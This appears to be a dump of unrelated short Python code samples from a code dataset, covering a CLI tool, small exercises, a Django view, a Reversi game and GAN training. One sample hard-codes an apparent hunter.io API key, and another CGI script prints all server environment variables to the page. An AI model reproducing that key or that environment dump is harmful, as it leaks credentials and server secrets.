:param known_args: NameSpace object from argparse parse_known_args methods
'''
# Supported unknow commands
arg = unknown_args[0]
pattern = re.compile("^[a-z0-9]{24}$")
if pattern.match(arg):
parser = getattr(arg_utils, 'parse_position_identity_args')
else:
assert arg in ['node', 'sku', 'service', 'test', 'install', 'sku', \
'log', 'config', 'mongo'],\
'Position argument {} is not supported'.format(arg)
parser = getattr(arg_utils, 'parse_position_{}_args'.format(arg))
args = parser(unknown_args, known_args)
return args
def api_output_view(result, args, options):
"""
Test
"""
content = {}
if args.min:
payload_config = local_utils.get_configurations('payload_min.json')
items = payload_config[args.opr]
print type(items)
for value in result.content:
print value
for item in items:
content[item] = value[item]
else:
content = result.content
print "{{\"data\": {}, \"_api\": \"-X {} -H {} {}\", \"_status\": {}}}".format(
content or "\"\"", options["method"], options["header"],
result.url, result.status_code
)
def run():
"""
Run commands
"""
arg_utils.parse_all_known(ARG_LIST)
if ARG_LIST_UNKNOWN:
parse_position_args(ARG_LIST_UNKNOWN, ARG_LIST)
if ARG_LIST.service:
arg_utils.parse_position_service_args(ARG_LIST_UNKNOWN, ARG_LIST)
operate_rackhd_service(ARG_LIST.service, ARG_LIST.services)
elif ARG_LIST.test:
pass
elif ARG_LIST.log:
pass
elif ARG_LIST.mongo:
print mongo.find_doc_by_id(ARG_LIST.mongo)
elif ARG_LIST.opr:
options = parse_api_options(ARG_LIST)
res = http_request.request(options)
api_output_view(res, ARG_LIST, options)
if __name__ == '__main__':
run()
|
12,987 | 2000ebdf8b0a62e84513ee58bbaba09bbc842813 | Import('env')
terminal_lib = env.Library('terminal', Glob('*.c'))
Return('terminal_lib')
|
12,988 | 6e6ca48dcd75d827fba7af4242c82070409200c0 | prompt = "Welcome to Pizza-O's! Type in any topping: "
prompt += "\nType 'quit' if you're done adding toppings."
topping = ""
toppings = []
while topping != 'quit':
topping = input(prompt)
toppings.append(topping)
if topping != 'quit':
print("We'll throw " + topping.title() + " on your pizza! Want any more?")
else:
print("Thanks! We'll get your order ready!")
print('These are your toppings!')
for top in toppings:
if top != 'quit':
print(top.title())
|
12,989 | 5145c410c341888fd433ca0990287d4cd93a09c8 | from django.shortcuts import render
from ProgramApp.models import program_registration
# Create your views here.
response = {}
def donation(request):
if request.user.is_authenticated:
strNama = request.user.first_name + " " + request.user.last_name
strNama = strNama.strip()
request.session['name'] = strNama
request.session['email'] = request.user.email
response['nama'] = request.session['name']
else:
response['nama'] = ''
donasi = program_registration.objects.filter(email=request.session['email'])
jumlahDonasi = 0;
for data in donasi:
jumlahDonasi += data.jumlah_uang
response['jumlahDonasi'] = jumlahDonasi
response['donationlist'] = donasi
return render(request, 'donationlist.html', response)
|
12,990 | 2e7b31e23034a4f3ea6a4e188a7cd4ffb1c9dbcd | from reversi_status import TeamType
from reversi_status import ReversiStatus
import reversi_ai
import reversi_user
import copy
stoneInitList = [[3,3,TeamType.WHITE], [3,4,TeamType.BLACK], [4,3,TeamType.BLACK], [4,4,TeamType.WHITE]]
status = ReversiStatus()
status.FillStone(TeamType.NOTEAM)
for l in stoneInitList:
status.setStone(l[0], l[1], l[2])
mPlayers = {
TeamType.BLACK: reversi_ai.ReversiAI(3),
TeamType.WHITE: reversi_ai.ReversiAI(1)
}
while not status.isFineshed():
print(str(status)) #ๅฑ้ขๆ็ป
#็ฝฎใใใจใใใ็ขบใใใใใใ็ฝฎใใใจใใใฎใชในใใๅๅพ
l = status.getPutableList()
if len(l) == 0:
status.passPlayer()
continue
cmd = mPlayers[status.getCurrentPlayer()].think(copy.deepcopy(status))
if cmd[0] == 'quit':
break
elif cmd[0] == 'put':
x = cmd[1]
y = cmd[2]
status.putStone(x,y)
elif cmd[0] == 'do_over':
if status.getChangeLogLen() >= 2:
status.doOver()
status.doOver()
print("result")
b = status.getBlackStoneAmount()
w = status.getWhiteStoneAmount()
print(str(TeamType.BLACK) + " = " + str(b))
print(str(TeamType.WHITE) + " = " + str(w))
winner = ""
if b > w:
winner = str(TeamType.BLACK)
elif b < w:
winner = str(TeamType.WHITE)
else:
winner = "Draw"
print("Winner = " + winner)
input("Enterใง็ตไบ>>") |
12,991 | 90d7be83fb4b3113793cc0cb5bbf40cc035b9b1d | #!/Python36/python
import os
print("Content-type: text/html")
print()
print("<font size=+1>Envirn</font></br>")
for param in os.environ.keys():
print("<b>%20s</b>: %s</br>" %(param, os.environ[param])) |
12,992 | 39a4d3f1d3725ebd34a3b9436e43e3008f95874d | from pm4py.objects.conversion.heuristics_net import factory, versions
|
12,993 | 592b9f1ca519db84a01e4d366c22e7ddef6ac5a7 | import unittest
import expressy
from expressy import expression, value
class ExpressyTest(unittest.TestCase):
def test_units(self):
self.assertEqual(expressy.parse('23 + 5')(), 28)
with self.assertRaises(SyntaxError):
expressy.parse('23Hz + 5Hz')
v = expressy.parse_with_units('23Hz + 5Hz')()
self.assertEqual(v.units, '1 / second')
self.assertEqual(v.magnitude, 28)
def test_variable(self):
bar = ['NO']
def is_constant(name):
return name != 'foo'
def symbols(name):
if name == 'foo':
return lambda: bar[0]
raise ValueError()
maker = expression.Maker(is_constant, symbols)
expr = maker('foo()')
self.assertFalse(isinstance(expr, value.Value))
self.assertEqual(expr(), 'NO')
bar[0] = 'YES'
self.assertEqual(expr(), 'YES')
|
12,994 | 71fdac490d5b0c11f6d6e93af5c5adb5a9b89c7a | import numpy as np
import nnabla as nn
import math
import os
from model import Model
from helper import imread, imwrite, imresize, imrescale, create_real_images
from helper import normalize, denormalize, save_pkl, rescale_generated_images
from nnabla.monitor import Monitor, MonitorSeries, MonitorImage
from nnabla.utils.image_utils import set_backend
def train(args):
# create real images
reals = create_real_images(args)
# save real images
for i, real in enumerate(reals):
image_path = os.path.join(args.logdir, 'real_%d.png' % i)
imwrite(denormalize(np.transpose(real, [0, 2, 3, 1])[0]), image_path)
# nnabla monitor
monitor = Monitor(args.logdir)
# use cv2 backend at MonitorImage
set_backend('cv2')
prev_models = []
Zs = []
noise_amps = []
for scale_num in range(len(reals)):
fs = min(args.fs_init * (2 ** (scale_num // 4)), 128)
min_fs = min(args.min_fs_init * (2 ** (scale_num // 4)), 128)
model = Model(real=reals[scale_num], num_layer=args.num_layer, fs=fs,
min_fs=min_fs, kernel=args.kernel, pad=args.pad,
lam_grad=args.lam_grad, alpha_recon=args.alpha_recon,
d_lr=args.d_lr, g_lr=args.g_lr, beta1=args.beta1,
gamma=args.gamma, lr_milestone=args.lr_milestone,
scope=str(scale_num))
z_curr = train_single_scale(args, scale_num, model, reals,
prev_models, Zs, noise_amps, monitor)
prev_models.append(model)
Zs.append(z_curr)
noise_amps.append(args.noise_amp)
# save data
nn.save_parameters(os.path.join(args.logdir, 'models.h5'))
save_pkl(Zs, os.path.join(args.logdir, 'Zs.pkl'))
save_pkl(reals, os.path.join(args.logdir, 'reals.pkl'))
save_pkl(noise_amps, os.path.join(args.logdir, 'noise_amps.pkl'))
return Zs, reals, noise_amps
def train_single_scale(args, index, model, reals, prev_models, Zs,
noise_amps, monitor):
# prepare log monitors
monitor_train_d_real = MonitorSeries('train_d_real%d' % index, monitor)
monitor_train_d_fake = MonitorSeries('train_d_fake%d' % index, monitor)
monitor_train_g_fake = MonitorSeries('train_g_fake%d' % index, monitor)
monitor_train_g_rec = MonitorSeries('train_g_rec%d' % index, monitor)
monitor_image_g = MonitorImage('image_g_%d' % index, monitor, interval=1,
num_images=1, normalize_method=denormalize)
real = reals[index]
ch, w, h = real.shape[1], real.shape[2], real.shape[3]
# training loop
for epoch in range(args.niter):
d_real_error_history = []
d_fake_error_history = []
g_fake_error_history = []
g_rec_error_history = []
if index == 0:
z_opt = np.random.normal(0.0, 1.0, size=(1, 1, w, h))
noise_ = np.random.normal(0.0, 1.0, size=(1, 1, w, h))
else:
z_opt = np.zeros((1, ch, w, h))
noise_ = np.random.normal(0.0, 1.0, size=(1, ch, w, h))
# discriminator training loop
for d_step in range(args.d_steps):
# previous outputs
if d_step == 0 and epoch == 0:
if index == 0:
prev = np.zeros_like(noise_)
z_prev = np.zeros_like(z_opt)
args.noise_amp = 1
else:
prev = _draw_concat(args, index, prev_models, Zs, reals,
noise_amps, 'rand')
z_prev = _draw_concat(args, index, prev_models, Zs,
reals, noise_amps, 'rec')
rmse = np.sqrt(np.mean((real - z_prev) ** 2))
args.noise_amp = args.noise_amp_init * rmse
else:
prev = _draw_concat(args, index, prev_models, Zs, reals,
noise_amps, 'rand')
# input noise
if index == 0:
noise = noise_
else:
noise = args.noise_amp * noise_ + prev
fake_error, real_error = model.update_d(epoch, noise, prev)
# accumulate errors for logging
d_real_error_history.append(real_error)
d_fake_error_history.append(fake_error)
# generator training loop
for g_step in range(args.g_steps):
noise_rec = args.noise_amp * z_opt + z_prev
fake_error, rec_error = model.update_g(epoch, noise, prev,
noise_rec, z_prev)
# accumulate errors for logging
g_fake_error_history.append(fake_error)
g_rec_error_history.append(rec_error)
# save errors
monitor_train_d_real.add(epoch, np.mean(d_real_error_history))
monitor_train_d_fake.add(epoch, np.mean(d_fake_error_history))
monitor_train_g_fake.add(epoch, np.mean(g_fake_error_history))
monitor_train_g_rec.add(epoch, np.mean(g_rec_error_history))
# save generated image
monitor_image_g.add(epoch, model.generate(noise, prev))
return z_opt
def _draw_concat(args, index, prev_models, Zs, reals, noise_amps, mode):
G_z = np.zeros_like(reals[0])
if index > 0:
pad_noise = int(((args.kernel - 1) * args.num_layer) / 2)
for i in range(index):
Z_opt = Zs[i]
real_curr = reals[i]
real_next = reals[i + 1]
noise_amp = noise_amps[i]
if mode == 'rand':
if i == 0:
z_shape = (1, 1) + real_curr.shape[2:]
else:
z_shape = (1,) + real_curr.shape[1:]
z = np.random.normal(0.0, 1.0, size=z_shape)
Z_in = noise_amp * z + G_z
elif mode == 'rec':
Z_in = noise_amp * Z_opt + G_z
else:
raise Exception
# generate image with previous output and noise
G_z = prev_models[i].generate(Z_in, G_z)
G_z = rescale_generated_images(G_z, 1 / args.scale_factor)
G_z = G_z[:, :, 0:real_next.shape[2], 0:real_next.shape[3]]
return G_z
|
12,995 | f5820ad2e7f3945dc4817a9ebf165848a8fabfc1 | import random
import numpy as np
class KnowledgeGraph:
def __init__(self, data_dir):
self.data_dir = data_dir
self.n_entity = 0
self.n_triplet = 0
self.w_triplet = []
self.w_triplet_ = []
self.neg_w_triplet = []
self.all_e1e2 = []
self.all_e1 = []
self.all_e2 = []
self.load_triplet()
def load_triplet(self):
fle = open(self.data_dir + 'kg_tuple.npy', 'rb')
w_triplet = np.load(fle)#e.g., [[e1, e2, r_w1, r_w2, ...], ...]
fle.close()
fle_neg = open(self.data_dir + 'kg_tuple_neg.npy', 'rb')
neg_w_triplet = np.load(fle_neg)
fle_neg.close()
self.w_triplet = w_triplet
self.neg_w_triplet = neg_w_triplet
self.n_triplet = w_triplet.shape[0]
def next_pos_batch(self, batch_size):
rand_idx = np.random.permutation(self.n_triplet)
start = 0
end = min(start+batch_size, self.n_triplet)
pos_batch = np.array(self.w_triplet[rand_idx[start:end],:])
while start < self.n_triplet:
yield pos_batch
start = end
end = min(start+batch_size, self.n_triplet)
pos_batch = np.array([self.w_triplet[i,:] for i in rand_idx[start:end]])
def next_neg_batch(self, batch_size):
rand_idx = np.random.permutation(self.n_triplet)
start = 0
end = min(start+batch_size, self.n_triplet)
neg_batch = np.array([self.neg_w_triplet[i] for i in rand_idx[start:end]])
while start < self.n_triplet:
yield neg_batch
start = end
end = min(start+batch_size, self.n_triplet)
neg_batch = np.array([self.neg_w_triplet[i] for i in rand_idx[start:end]])
|
12,996 | 8c67819c53aa2ef9431915260b2fb09dad19872f | # https://api.hunter.io/v2/email-verifier?email=shivam@cez.co.in&api_key=27ad6b2410afdd93b82abc5b6e48384f942c952d
import requests
url = "https://api.hunter.io/v2/email-verifier?email="+input("Enter Mail ID- ")+"&api_key=27ad6b2410afdd93b82abc5b6e48384f942c952d"
r = requests.request('GET', url)
d = r.json()
print(d["data"]["result"]) |
12,997 | f9fe51d022f1bced8d45232e4c9cbe78893002f9 | """Implement quick sort
>>> quickSort([3,5,6,1,2,8])
[1, 2, 3, 5, 6, 8]
>>> quickSort([1,2,3])
[1, 2, 3]
>>> quickSort([])
[]
>>> quickSort([3,5,6,1,2,3,2,8])
[1, 2, 2, 3, 3, 5, 6, 8]
"""
def quickSort(arr):
if len(arr) < 2:
return arr
pivot = arr[len(arr)//2]
left = []
right = []
center = []
for num in arr:
if num == pivot:
center.append(num)
elif num > pivot:
right.append(num)
elif num < pivot:
left.append(num)
return quickSort(left)+center+quickSort(right)
if __name__ == '__main__':
import doctest
if doctest.testmod().failed == 0:
print('You sort it!') |
12,998 | 6f7a26d556e48c1941a07d9417ddb7e377f92345 | slow = 1000
fast = 1
year = 1
while fast < slow:
slow += slow
fast += fast
year += 1
slow -= 0.4*slow
fast -= 0.3*fast
print year, slow, fast
if(fast>=slow):
print year
|
12,999 | b950752471fe5760acd11b1e5e0264713da7af8a | #! /usr/bin/env python
# encoding: UTF-8
import os
import sys
os.mkdir('test')
print os.listdir(".")
os.rmdir('test')
print ""
sys.exit(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.